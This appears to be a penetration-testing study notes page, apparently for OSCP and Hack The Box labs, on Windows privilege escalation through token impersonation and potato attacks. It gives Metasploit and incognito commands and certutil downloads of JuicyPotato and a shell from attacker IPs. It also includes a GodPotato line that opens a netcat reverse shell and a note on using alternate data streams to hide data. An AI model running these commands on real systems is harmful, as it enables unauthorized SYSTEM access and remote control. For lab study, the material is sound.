// notes/ PrivEsc — Windows
🪟

Impersonation And Potato Attacks

<figure<img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""<figcaption<pHTB Machine Jeeves</p</figcaption</figure

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/impersonation-and-potato-attacks

Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

<figure><img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""><figcaption><p>HTB Machine Jeeves</p></figcaption></figure>

{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-impersonation-privileges" %}

Potato Attack Overview

<figure><img src="/files/kSOCeuSTpVJz0qPxv6FY" alt=""><figcaption><p>High level Overview from foxglovesecurity </p></figcaption></figure>

Escalation via Potato Attack

After getting a meterpreter shell

bash
$background
$use exploit/windows/local/ms16_075_reflection
$set LHOST tun0
$set LPORT 1738 <-- Something different from the first shell
$exploit
$

Inside of new meterpreter shell

bash
$load incognito
$list_tokens -u
$impersonate_token "NT AUTHORITY\SYSTEM"
$shell
$whoami

Manual Juicy Potato Attack

code
01cd C:\Windows\System32\spool\drivers\color\
02certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
03certutil.exe -urlcache -f http://10.9.209.91/shell.exe
04juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

GOD POTATO

code
01godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

{% embed url="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" %}

{% embed url="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" %} Technical Overview {% endembed %}

{% embed url="https://github.com/ohpe/juicy-potato" %} Other Version {% endembed %}

{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato" %}

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

code
01dir /r
02more hm.txt:root.txt:$DATA

{% embed url="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" %}